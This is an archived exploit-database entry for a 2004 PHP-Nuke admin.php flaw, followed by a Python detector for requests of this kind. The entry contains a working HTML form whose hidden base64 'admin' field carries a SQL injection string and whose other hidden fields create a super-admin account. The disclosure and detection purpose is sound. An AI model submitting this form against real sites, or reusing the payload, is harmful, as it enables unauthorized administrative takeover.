by: milw0rm.com
Patch Exists: NO
2004

HTTP form exploit demonstration

This demonstration exploit shows how an attacker can use an HTTP form to perform unauthorized actions on a website. The form posts to the site's admin.php page and creates a new admin user with elevated privileges. It collects a username, name, password, and email address, and carries hidden fields that set additional parameters, including admin rights and the operation to add an author. Clicking the 'Create Admin' button submits the form and creates the new admin user.

Mitigation:

To mitigate this vulnerability, website administrators should implement proper input validation and access controls. They should also ensure that sensitive operations, such as creating admin users, require additional authentication and authorization.

Exploit-DB raw data:

A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

# milw0rm.com [2004-09-08]
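
A defender-side check for the request this form produces, as an added example that is not part of the original advisory: it base64-decodes the hidden `admin` field and flags SQL syntax inside it, together with the `op=AddAuthor` / `add_radminsuper=1` pair. The function names, the sample request bodies and the expected shape of a legitimate decoded value (`name:32-hex-hash[:lang]`) are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Assumption: a legitimate decoded value looks like "name:32-hex-hash[:lang]".
EXPECTED = re.compile(r"^[A-Za-z0-9_-]{1,25}:[0-9a-f]{32}(:[A-Za-z0-9_-]*)?$")
SQL_TOKENS = re.compile(r"'|/\*|--|\bunion\b|\bselect\b", re.IGNORECASE)

# Constructed request bodies; only the hidden-field values come from the page.
SAMPLE_FLAGGED = (
    "add_aid=newuser&add_name=n&add_pwd=p&add_email=e%40example.test"
    "&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor"
)
SAMPLE_BENIGN = "aid=editor&pwd=secret&op=login"


def decode_admin(value):
    """Return the base64-decoded text of the `admin` field, or None if undecodable."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def inspect_post(path, body):
    """Return a list of findings for one POST (request path + urlencoded body)."""
    if not path.split("?", 1)[0].endswith("/admin.php"):
        return []
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if "admin" in fields:
        decoded = decode_admin(fields["admin"])
        if decoded is None:
            findings.append("admin field is not valid base64")
        elif SQL_TOKENS.search(decoded):
            findings.append("SQL syntax in decoded admin field: %r" % decoded)
        elif not EXPECTED.match(decoded):
            findings.append("decoded admin field has unexpected shape")
    # The hidden-field pair from the form: new author with super-admin rights.
    if fields.get("op") == "AddAuthor" and fields.get("add_radminsuper") == "1":
        findings.append("op=AddAuthor with add_radminsuper=1")
    return findings


if __name__ == "__main__":
    for finding in inspect_post("/admin.php", SAMPLE_FLAGGED):
        print(finding)
```

The same two conditions can be expressed as a web application firewall or log-review rule on POST requests to admin.php.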